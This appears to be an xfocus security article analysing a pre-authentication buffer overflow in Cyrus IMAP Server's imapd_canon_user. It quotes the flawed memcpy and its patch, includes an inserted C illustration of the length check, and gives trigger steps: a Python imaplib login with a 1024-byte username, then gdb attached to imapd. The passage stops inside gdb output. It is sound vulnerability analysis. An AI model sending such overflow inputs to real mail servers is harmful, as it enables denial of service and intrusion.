<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Analysis of the Cyrus IMAP Server IMAPMAGICPLUS Pre-Authentication Remote Buffer Overflow Vulnerability</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="Keywords" content="安全焦点, xfocus, 陷阱网络, honeynet, honeypot, 调查取证, forensic, 入侵检测, intrusion detection, 无线安全, wireless security, 安全论坛, security forums, 安全工具, security tools, 攻击程序, exploits, 安全公告, security advisories, 安全漏洞, security vulnerabilities, 安全教程, security tutorials, 安全培训, security training, 安全帮助, security help, 安全标准, security standards, 安全代码, security code, 安全资源, security resources, 安全编程, security programming, 加密, cryptography," />
<link rel="stylesheet" href="../../css/plone.css" type="text/css">
</head>

<body bgcolor="#FFFFFF" text="#000000">
<div class="top">
  <img src="../../images/logo.gif" border="0" width="180" height="80" alt="xfocus logo">
  <img src="../../images/title.gif" border="0" width="230" height="20" alt="xfocus title">
</div>
<div class="tabs">
  <a href="../../index.html" class="plain">Home</a>
  <a href="../../releases/index.html" class="plain">Xfocus Originals</a>
  <a href="../../articles/index.html" class="selected">Security Articles</a>
  <a href="../../tools/index.html" class="plain">Security Tools</a>
  <a href="../../vuls/index.html" class="plain">Security Vulnerabilities</a>
  <a href="../../projects/index.html" class="plain">Xfocus Projects</a>
  <a href="https://www.xfocus.net/bbs/index.php?lang=cn" class="plain">Xfocus Forum</a>
  <a href="../../about/index.html" class="plain">About Us</a>
</div>
<table class="columns">
  <tr>
    <td class="left">
	</td>
    <td class="main">
	  <h1>Analysis of the Cyrus IMAP Server IMAPMAGICPLUS Pre-Authentication Remote Buffer Overflow Vulnerability</h1><br>Created: 2004-12-06<br>Article type: Original<br>Submitted by: <a href='https://www.xfocus.net/bbs/index.php?lang=cn&act=Profile&do=03&MID=2'>san</a> (san_at_xfocus.org)<br><br>Analysis of the Cyrus IMAP Server IMAPMAGICPLUS Pre-Authentication Remote Buffer Overflow Vulnerability<br />
<br />
Stefan Esser discovered four vulnerabilities in Cyrus IMAP Server. Of these, the IMAPMAGICPLUS pre-authentication remote buffer overflow is the most dangerous and the easiest to exploit. This section presents an analysis of that vulnerability.<br />
<br />
1 Locating the vulnerability<br />
<br />
Comparing the imapd.c source file between Cyrus IMAP Server 2.2.8 and 2.2.9 quickly reveals that the problematic code is in the imapd_canon_user function:<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (config_getswitch(IMAPOPT_IMAPMAGICPLUS)) {<br />
&nbsp;&nbsp;&nbsp;&nbsp;/* make a working copy of the auth[z]id */<br />
&nbsp;&nbsp;&nbsp;&nbsp;memcpy(userbuf, user, ulen);<br />
&nbsp;&nbsp;&nbsp;&nbsp;userbuf[ulen] = &#39;\0&#39;;<br />
&nbsp;&nbsp;&nbsp;&nbsp;user = userbuf;<br />
<br />
userbuf is a local variable of imapd_canon_user of size MAX_MAILBOX_NAME+1, that is, 491 bytes. user is a parameter passed into imapd_canon_user, and no length check is performed on it. When the IMAPOPT_IMAPMAGICPLUS option is enabled, the memcpy is executed, causing a stack overflow that overwrites the function's return address. Cyrus IMAP Server 2.2.9 patched the code as follows:<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (config_getswitch(IMAPOPT_IMAPMAGICPLUS)) {<br />
&nbsp;&nbsp;&nbsp;&nbsp;/* make a working copy of the auth[z]id */<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (ulen &gt; MAX_MAILBOX_NAME) {<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sasl_seterror(conn, 0, &quot;buffer overflow while canonicalizing&quot;);<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return SASL_BUFOVER;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;memcpy(userbuf, user, ulen);<br />
&nbsp;&nbsp;&nbsp;&nbsp;userbuf[ulen] = &#39;\0&#39;;<br />
&nbsp;&nbsp;&nbsp;&nbsp;user = userbuf;<br />
<br />
As can be seen, this is a very typical stack overflow vulnerability.<br />
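The following is an added illustration, not code from Cyrus or from the article: it models the copy step quoted above as a self-contained C program so the boundary of the 2.2.9 fix can be checked. MAX_MAILBOX_NAME is 490 here to match the 491-byte userbuf the article describes; the numeric value of SASL_BUFOVER, the set_imapmagicplus switch, and the helper names overflow_bytes, canon_user_fixed and canon_aaaa are assumptions of this example. overflow_bytes reports how far the unpatched 2.2.8 sequence (memcpy plus the NUL store) would write past the end of userbuf for a given username length, which is why a 1024-byte username reaches the saved return address; canon_user_fixed applies the 2.2.9 check before the copy.<br />

```c
#include <stdio.h>
#include <string.h>

/* Added illustration, not Cyrus source: a stand-in for the copy step the
 * article quotes from imapd_canon_user(). The buffer size matches the
 * article (MAX_MAILBOX_NAME + 1 = 491 bytes); the SASL_* values and the
 * config switch are local assumptions that only mirror the real names. */
#define MAX_MAILBOX_NAME 490
#define SASL_OK          0
#define SASL_BUFOVER     (-4)   /* assumed numeric value */

/* Stand-in for config_getswitch(IMAPOPT_IMAPMAGICPLUS), i.e. whether
 * "imapmagicplus: 1" is set in imapd.conf. */
static int imapmagicplus_enabled = 0;
void set_imapmagicplus(int on) { imapmagicplus_enabled = on; }

/* How many bytes the unpatched 2.2.8 sequence (memcpy of ulen bytes plus
 * the terminating NUL store) would write past the end of userbuf for a
 * username of ulen bytes. 0 means the name fits. */
size_t overflow_bytes(size_t ulen)
{
    size_t needed = ulen + 1;                /* copy + '\0' */
    size_t avail  = MAX_MAILBOX_NAME + 1;    /* sizeof userbuf */
    return needed > avail ? needed - avail : 0;
}

/* Hardened copy shaped like the 2.2.9 fix: the length is checked before
 * memcpy, so the largest accepted name is exactly MAX_MAILBOX_NAME bytes,
 * which together with its NUL fills the 491-byte buffer without overrun.
 * The canonicalised id is written to out (outlen bytes). */
int canon_user_fixed(const char *user, size_t ulen, char *out, size_t outlen)
{
    char userbuf[MAX_MAILBOX_NAME + 1];

    if (imapmagicplus_enabled) {
        /* make a working copy of the auth[z]id */
        if (ulen > MAX_MAILBOX_NAME) {
            /* 2.2.9: sasl_seterror(conn, 0, "buffer overflow while canonicalizing") */
            return SASL_BUFOVER;
        }
        memcpy(userbuf, user, ulen);
        userbuf[ulen] = '\0';
        user = userbuf;
        /* the real function goes on to strip the "+" suffix on this copy */
    }
    /* hand the (possibly copied) id to the caller with the same discipline */
    if (ulen >= outlen)
        return SASL_BUFOVER;
    memcpy(out, user, ulen);
    out[ulen] = '\0';
    return SASL_OK;
}

/* Run a username of ulen 'A' bytes (the shape of the article's
 * login("A"*1024, "") call) through the hardened copy and return the
 * SASL status. Input is constructed here, nothing is sent anywhere. */
int canon_aaaa(size_t ulen)
{
    char name[2048];
    char out[MAX_MAILBOX_NAME + 1];
    if (ulen > sizeof name)
        return SASL_BUFOVER;
    memset(name, 'A', ulen);
    return canon_user_fixed(name, ulen, out, sizeof out);
}

int main(void)
{
    size_t lens[] = { 3, 490, 491, 1024 };
    size_t i;
    set_imapmagicplus(1);
    for (i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        printf("ulen=%4zu  2.2.8 overrun=%4zu bytes  2.2.9 status=%s\n",
               lens[i], overflow_bytes(lens[i]),
               canon_aaaa(lens[i]) == SASL_OK ? "SASL_OK" : "SASL_BUFOVER");
    }
    return 0;
}
```

Two points this makes concrete: the fix compares with `>` rather than `>=` because userbuf has MAX_MAILBOX_NAME+1 bytes, so a 490-byte name plus its NUL is the exact fit and 491 is the first length rejected; and with a 1024-byte name the old code writes 534 bytes beyond the buffer, far more than needed to reach the saved frame.<br />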
<br />
2 Triggering the vulnerability<br />
<br />
Although the problematic code is easy to find, what matters is finding a way to trigger it. First, install a Cyrus IMAP Server that contains this vulnerability; refer to the Cyrus documentation for the installation procedure, which is not repeated here. After installation, append the following line to /etc/imapd.conf:<br />
<br />
imapmagicplus: 1<br />
<br />
This enables the IMAPMAGICPLUS option; then start the service. The user variable is the username entered by the client, so try logging in to the Cyrus IMAP Server with a Python script:<br />
<br />
[san@ /home/san/bugtrack]&gt; python<br />
Python 2.3.2 (#1, Nov 19 2003, 15:32:26)<br />
[GCC 2.96 20000731 (Red Hat Linux 7.1 2.96-98)] on linux2<br />
Type &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.<br />
&gt;&gt;&gt; import imaplib<br />
&gt;&gt;&gt; M = imaplib.IMAP4(&quot;192.168.7.100&quot;)<br />
&gt;&gt;&gt; M.login(&quot;A&quot;*1024, &quot;&quot;)<br />
<br />
Before executing login, in another terminal you can see that an imapd process has been forked; attach the gdb debugger to this process:<br />
<br />
[root@ /home/san/bugtrack]&gt; ps aux|grep imapd<br />
cyrus&nbsp;&nbsp;&nbsp;&nbsp;27258&nbsp;&nbsp;0.0&nbsp;&nbsp;0.5 20796 1496 ?&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;S&nbsp;&nbsp;&nbsp;&nbsp;16:39&nbsp;&nbsp; 0:00 imapd<br />
[root@ /home/san/bugtrack]&gt; gdb /usr/cyrus/bin/imapd 27258<br />
GNU gdb Red Hat Linux (5.1-1)<br />
Copyright 2001 Free Software Foundation, Inc.<br />
GDB is free software, covered by the GNU General Public License, and you are<br />
welcome to change it and/or distribute copies of it under certain conditions.<br />
Type &quot;show copying&quot; to see the conditions.<br />
There is absolutely no warranty for GDB.&nbsp;&nbsp;Type &quot;show warranty&quot; for details.<br />
This GDB was configured as &quot;i386-redhat-linux&quot;...<br />
/home/san/bugtrack/27258: No such file or directory.<br />
Attaching to program: /usr/cyrus/bin/imapd, process 27258<br />
Reading symbols from /usr/local/lib/libsasl2.so.2...done.<br />
Loaded symbols for /usr/local/lib/libsasl2.so.2<br />
Reading symbols from /lib/libssl.so.2...done.<br />
Loaded symbols for /lib/libssl.so.2<br />
Reading symbols from /lib/libcrypto.so.2...done.<br />
Loaded symbols for /lib/libcrypto.so.2<br />
Reading symbols from /lib/libresolv.so.2...done.<br />
Loaded symbols for /lib/libresolv.so.2<br />
Reading symbols from /lib/libdb-3.2.so...done.<br />
Loaded symbols for /lib/libdb-3.2.so<br />
Reading symbols from /lib/libcom_err.so.2...done.<br />
Loaded symbols for /lib/libcom_err.so.2<br />
Reading symbols from /lib/libnsl.so.1...done.<br />
